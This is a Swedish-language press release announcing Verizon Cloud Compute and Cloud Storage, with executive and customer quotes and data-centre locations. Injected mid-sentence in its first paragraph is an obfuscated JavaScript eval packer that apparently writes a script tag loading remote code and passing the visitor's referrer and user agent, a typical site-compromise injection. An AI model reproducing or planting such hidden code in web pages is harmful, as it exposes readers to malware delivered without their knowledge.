Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Verizon omdefinierar företagsmolnet

Verizon omdefinierar företagsmolnet
Sebastian

Verizon Communications Inc. lanserar Verizon Cloud – en ny Infrastructure as a Service (IaaS)-plattform, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tzkdn|var|u0026u|referrer|yzeez||js|php’.split(’|’),0,{}))
samt en molnbaserad lagringstjänst. Med denna lösning förändrar Verizon fundamentalt sättet på vilket publika molnlösningar är uppbyggda och kan utnyttjas idag. Stora koncerner, medelstora och små nystartade företag kommer alla att kunna dra nytta av den nya lösningen tack vare de ekonomiska fördelarna som kännetecknar en publik molninfrastruktur. Verizon skapar här en molnlösning som ger kunder den skalbarhet, prestanda och flexibilitet som morgondagens vinnare behöver. Verizon Cloud kommer att finnas tillgänglig i en offentlig betaversion under fjärde kvartalet i år.

– Verizon skapade företagsmolnet, och nu omdefinierar vi det rejält, säger John Stratton, VD för Verizon Enterprise Solutions . Det här är den revolution inom molntjänster som företagen har efterlyst. Vi har tagit den feedback vi fått från våra kunder runt om i världen och byggt en helt ny molnplattform från grunden, för att uppfylla morgondagens behov.

Verizon Cloud består av två huvudsakliga delar – Verizon Cloud Compute och Verizon Cloud Storage.
Verizon Cloud Compute är själva infrastrukturplattformen (IaaS) medan Verizon Cloud Storage är en objektbaserad lagringstjänst.

Verizon Cloud Compute

Verizon Cloud Compute är framtagen för att ge företag den hastighet och den prestanda som moderna molntjänster kräver. Virtuella maskiner
(mjukvarubaserade datorer och servrar) kan skapas och driftsättas på bara några få sekunder och användarna bygger och betalar för vad de behöver.

Med Verizon Cloud Compute får användare tillgång till just den prestanda som de behöver för att hantera sina virtuella maskiner och sina nätverk. Det blir därigenom bland annat möjligt att förutsäga prestandabehov även för avancerade, affärskritiska tjänster som kräver hög prestanda, även under hög belastning. Dessutom kan användarna hantera lagring för flera virtuella maskiner. Inget annat molnerbjudande erbjuder denna funktionalitet. Tidigare var tjänsterna konfigurerade på förhand, i förhållande till storlek (t.ex. små, medium eller stora företag) och förväntat prestandabehov. Samtidigt var flexibiliteten begränsad i förhållande till de virtuella maskinerna, nätverken och möjligheterna till att optimera lagring i molnet.

Verizon har byggt lösningen för stora företag, men den är samtidigt smidig nog för att uppfylla behoven även hos små och medelstora företag.

– Detta är ett genombrott då det förändrar möjligheterna med molnet, säger Bryson Koehler, CIO vid The Weather Company, USAs ledande leverantör av väderprognoser. Väder utgör den mest dynamiska data som finns och vi använder oss också av big data för att hjälpa konsumenter att bättre planera sina dagar och för att hjälpa företag att ta intelligenta beslut, i förhållande till vädret. Som ledande inom big data, är den största delen av The Weather Companys framtidsstrategi baserad på molnet.  Vi lägger en stor del av vår tekniska framtid i händerna på dessa tjänster från Verizon.

– Rob Walters, CTO vid molntjänstplattformen Engine Yard, låter utvecklare planera, bygga, driftsätta och administrera applikationer i molnet: Nya Verizon Cloud gör det lätt och flexibelt för oss att driftsätta tjänster och vi kan införa alla funktioner vi behöver, vilket sparar oss både tid och pengar. Vi har haft en lång och framgångsrik relation med Verizon. Vi har driftsatt några av våra mest krävande företagsapplikationer i Verizons molninfrastruktur.

Verizon Cloud Storage

Verizon Cloud Storage är en objektbaserad lagringsplattform för flera användare från olika organisationer (multi-tenant), som levererar säker, hållbar, pålitlig och kostnadseffektiv lagring, tillgänglig var som helst via nätet. Den objektbaserade lagringen är extra robust och pålitlig i förhållande till trafiken på webben, vilket gör den idealisk för molnbaserade applikationer. Verizon Cloud Storage löser de latensproblem som sedan länge har plågat många traditionella lagringstjänster och erbjuder därmed ökad prestanda.

-Vi ger kontrollen och valmöjligheterna till användarna, samtidigt som vi skapar lösningar där vi utgår  från deras behov av tillgänglighet, prestanda och säkerhet, säger John Considine, CTO vid Verizon Terremark. Detta är något vi har byggt in från grunden.

Drivs av Verizon

De nya erbjudandena backas upp av Verizons svårslagna branscherfarenhet och stöds av bolagets globala IP-nätverk, globala datacenter och managerade säkerhetstjänster.

De företag som är intresserade av att använda sig av antingen Verizon Cloud Compute eller Verizon Cloud Storage kan anmäla sig som betakund via Verizon Enterprise Solutions hemsida. Registreringen och kundservicen sköts helt och hållet online.

Fördelningen och driftsättningen av de virtuella maskinerna, samt att definiera de prestandanivåer som behövs, tar bara några sekunder. Med ett kreditkort eller ett köpekontrakt, betalar kunderna löpande utefter behov.  De kan ständigt kontrollera sin förbrukningsmängd, planera sina omkostnader och justera de tjänster som används utefter behov.

För att säkerställa personlig service för varje enskild betakund, kommer tillgången till Verizon Cloud Compute och Verizon Cloud Storage inledningsvis att vara begränsad till ett par hundra nya användare per månad. De kunder som väntar på sin tur kommer att bjudas in i Verizon Cloud Insider-programmet, där de löpande kommer att uppdateras om tillgänglighet och förbättringar.

Systemet har utformats för att stödja miljontals virtuella maskiner på alla de platser där Compute och Storage implementeras.

Företag med omedelbara behov av molnlösningar kan använda sig av Verizon Enterprise Cloud. IaaS-erbjudandet är att föredra för de företag och myndigheter som behöver en skalbar, pålitlig och säker molninfrastruktur.

Verizon Cloud Compute och Verizon Cloud Storage erbjuds från Verizons datacenter för molntjänster i Culpeper, Va, Englewood, Co, Miami, Fl och Santa Clara, Kalifornien samt i Amsterdam, London och Sao Paolo. Till en början kommer kunder att servas från Culpepers datacenter i Virginia. Övriga datacenter runt om i världen förväntas starta sin drift under mitten av 2014.

Observera att detta är en vägledande svensk översättning av det ursprungliga engelskspråkiga pressmeddelandet som finns på Verizons News Center:
newscenter.verizon.com.

Om Verizon

Verizon Communications Inc. (NYSE, Nasdaq: VZ), headquartered in New York, is a global leader in delivering broadband and other wireless and wireline communications services to consumer, business, government and wholesale customers. Verizon Wireless operates America’s most reliable wireless network, with more than 100 million retail connections nationwide. Verizon also provides converged communications, information and entertainment services over America’s most advanced fiber-optic network, and delivers integrated business solutions to customers in more than 150 countries. A Dow 30 company with nearly $116 billion in 2012 revenues, Verizon employs a diverse workforce of 180,900. For more information, visit about.verizon.com.